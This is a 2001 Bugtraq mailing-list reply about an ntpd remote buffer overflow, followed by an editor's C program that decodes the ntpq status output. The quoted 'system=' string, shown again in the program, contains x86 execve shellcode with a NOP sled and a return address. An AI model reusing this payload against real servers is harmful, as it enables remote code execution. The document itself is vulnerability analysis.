[20102] in bugtraq


Re: ntpd =< 4.0.99k remote buffer overflow

daemon@ATHENA.MIT.EDU (Stephen Clouse)
Mon Apr 9 06:30:56 2001

Mail-Followup-To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>,
                  bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain
Content-Disposition: inline; filename="msg.pgp"
Message-ID:  <20010407202911.A8759@owns.warpcore.org>
Date:         Sat, 7 Apr 2001 20:29:11 -0500
Reply-To: Stephen Clouse <stephenc@THEIQGROUP.COM>
From: Stephen Clouse <stephenc@THEIQGROUP.COM>
X-To:         Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <20010407092643.Q856@riget.scene.pl>; from
              venglin@freebsd.lublin.pl on Sat, Apr 07, 2001 at 09:26:43AM +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On Sat, Apr 07, 2001 at 09:26:43AM +0200, Przemyslaw Frasunek wrote:
> As I said, exploiting this overflow isn't so easy -- offset and align
> values vary from platform to platform. Exploit was tested only
> on bare RedHat 7.0 and FreeBSD 4.2-STABLE compiled with -O6 -fomit-frame-pointer
> -march=pentiumpro.
>
> Did your ntpd segfault after running an exploit?

Nope, it keeps running normally -- it's still in perfect sync with our main time
server.

I am now noticing that it definitely overflows *something*, though -- someone
pointed out querying the local ntpd's status:

status=0684 leap_none, sync_ntp, 8 events, event_peer/strat_chg,
version="ntpd 4.0.99k Sun Apr  1 04:00:13 CDT 2001 (2)",
processor="i686",
system="M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-k^_^M-^Iv^H1M-@M-^HF^
GM-^IF^LM-0^KM-^IM-sM-^MN^HM-^MV^LM-MM-^@1M-[M-^IM-X@M-MM-^@M-hM-\M-^?M-^?M-^?/
tmp/shM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
- -^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PwM-wM-^?M-?w
M-wM-^?M-?M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM
- -^PM-^PM-^P,
leap=00, stratum=5, precision=-17, rootdelay=217.951,
rootdispersion=153.179, peer=21044, refid=fs1.theiqgroup.com,
reftime=be7a357a.7fa615a8  Sat, Apr  7 2001 19:55:22.498, poll=9,
clock=be7a364e.b7422467  Sat, Apr  7 2001 19:58:54.715, state=4,
phase=0.224, frequency=-4.567, jitter=0.042, stability=0.004

So the initial assessment is probably wrong.  However, I wasted a whole
afternoon searching and cannot for the life of me find the offset where this
data ends up....

- --
Stephen Clouse <stephenc@theiqgroup.com>
Senior Programmer, IQ Coordinator Project Lead
The IQ Group, Inc. <http://www.theiqgroup.com/>

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8

iQA/AwUBOs++5gOGqGs0PadnEQJDCQCfWzZkX6q2RT5fl0OlmR9qL/uQ2+YAn1Cm
46oHzsFjpYgeDq3IME5Y3m1c
=6LdC
-----END PGP SIGNATURE-----
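
Added here as an illustration, not part of Stephen Clouse's message or of the ntp distribution: the system= value above is the cat -v style rendering ntpq uses for non-printable bytes, and decoding it shows what actually landed in that variable. The C program below is this editor's own; the only thing taken from the post is the quoted string, with the 80-column line wraps joined and the PGP "- -" dash-escapes undone. The notation is lossy: "^M-^I" can be read as 0x5e 0x89 or as 0x0d '-' 0x09, so the decoder assumes a caret directly followed by "M-" is a literal caret, the reading that gives "pop %esi" (0x5e) right after "jmp 0x1f" (eb 1f). Under that assumption the bytes decode to a run of 0x90 NOPs, a Linux x86 execve shellcode (mov $0xb,%al; int $0x80, then an exit) followed by the string "/tmp/sh", another NOP run, the value 0xbffff777 twice in little-endian order (a typical x86 Linux stack address, presumably the intended return address), and more NOPs. That is the exploit payload stored intact in whatever ntpd keeps the system string in, which is consistent with the overflow having overwritten something ntpd later serves rather than a saved return address; where exactly that is in memory is not something this dump shows.

```c
/*
 * Decode the cat -v style rendering ntpq printed for the "system=" variable
 * and describe the bytes. Added example; not code from the post or from ntp.
 *
 * cat -v notation:
 *   printable 0x20..0x7e  -> itself
 *   control  0x00..0x1f   -> "^" + (byte + 0x40)        e.g. 0x1f -> "^_"
 *   0x7f                  -> "^?"
 *   byte with high bit    -> "M-" + rendering of (byte & 0x7f)
 *                            e.g. 0x90 -> "M-^P", 0xeb -> "M-k", 0xff -> "M-^?"
 * The notation is not uniquely decodable; see the assumption in decode_token().
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Copied from the post: the text between system=" and the closing comma, with
 * the line wraps joined and the PGP "- -" dash-escapes undone. Constructed
 * test input for this example. */
static const char SAMPLE[] =
    "M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-k^_^M-^Iv^H1M-@M-^HF^"
    "GM-^IF^LM-0^KM-^IM-sM-^MN^HM-^MV^LM-MM-^@1M-[M-^IM-X@M-MM-^@M-hM-\\M-^?M-^?M-^?/"
    "tmp/shM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM"
    "-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PwM-wM-^?M-?w"
    "M-wM-^?M-?M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM"
    "-^PM-^PM-^P";

/* Decode one token at s into *out. Returns characters consumed, 0 at end. */
static size_t decode_token(const char *s, unsigned char *out)
{
    unsigned char c = (unsigned char)s[0];
    if (c == '\0')
        return 0;
    if (c == 'M' && s[1] == '-' && s[2] != '\0') {      /* meta: high bit set */
        unsigned char low;
        size_t n = decode_token(s + 2, &low);           /* inner "^X", "^?" or printable */
        *out = (unsigned char)(low | 0x80);
        return 2 + n;
    }
    if (c == '^') {
        /* Assumption: a caret directly followed by "M-" is a literal 0x5e,
         * not ^M (0x0d) followed by '-'. This is the reading that yields
         * "pop %esi" after "jmp 0x1f" in the sample; it is a heuristic. */
        if (s[1] == 'M' && s[2] == '-') { *out = '^'; return 1; }
        if (s[1] == '?')                { *out = 0x7f; return 2; }
        if (s[1] >= '@' && s[1] <= '_') { *out = (unsigned char)(s[1] - '@'); return 2; }
    }
    *out = c;                                           /* plain printable byte */
    return 1;
}

/* Decode a whole cat -v string; returns bytes written (stops at cap). */
size_t decode_catv(const char *s, unsigned char *out, size_t cap)
{
    size_t n = 0, used;
    unsigned char b;
    while (n < cap && (used = decode_token(s, &b)) > 0) {
        out[n++] = b;
        s += used;
    }
    return n;
}

size_t decode_sample(unsigned char *out, size_t cap)
{
    return decode_catv(SAMPLE, out, cap);
}

/* Length of the leading run of 0x90 (x86 NOP) bytes. */
size_t nop_sled_len(const unsigned char *b, size_t n)
{
    size_t i = 0;
    while (i < n && b[i] == 0x90)
        i++;
    return i;
}

/* Offset of the first occurrence of needle in hay, or -1 if absent. */
long find_bytes(const unsigned char *hay, size_t n, const void *needle, size_t m)
{
    size_t i;
    if (m == 0 || m > n)
        return -1;
    for (i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0)
            return (long)i;
    return -1;
}

/* How many positions hold v as a little-endian 32-bit value, the byte order
 * a return address has on the x86 stack. */
size_t count_dword_le(const unsigned char *b, size_t n, uint32_t v)
{
    size_t i, hits = 0;
    for (i = 0; i + 4 <= n; i++) {
        uint32_t w = (uint32_t)b[i] | ((uint32_t)b[i + 1] << 8) |
                     ((uint32_t)b[i + 2] << 16) | ((uint32_t)b[i + 3] << 24);
        if (w == v)
            hits++;
    }
    return hits;
}

int main(void)
{
    unsigned char buf[512];
    size_t n = decode_sample(buf, sizeof buf);
    size_t sled = nop_sled_len(buf, n);
    long sh = find_bytes(buf, n, "/tmp/sh", 7);
    size_t i;

    printf("%zu bytes decoded; NOP sled of %zu bytes; code at offset %zu:", n, sled, sled);
    for (i = sled; i < n && i < sled + 16; i++)
        printf(" %02x", buf[i]);
    printf(" ...\n\"/tmp/sh\" at offset %ld; 0xbffff777 appears %zu times\n",
           sh, count_dword_le(buf, n, 0xbffff777u));
    return 0;
}
```

Build with cc -std=c99 -Wall and run; the same decoder works on any cat -v or ntpq rendering, but the caret rule is a guess that should be checked against the surrounding bytes whenever "^M-" occurs.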
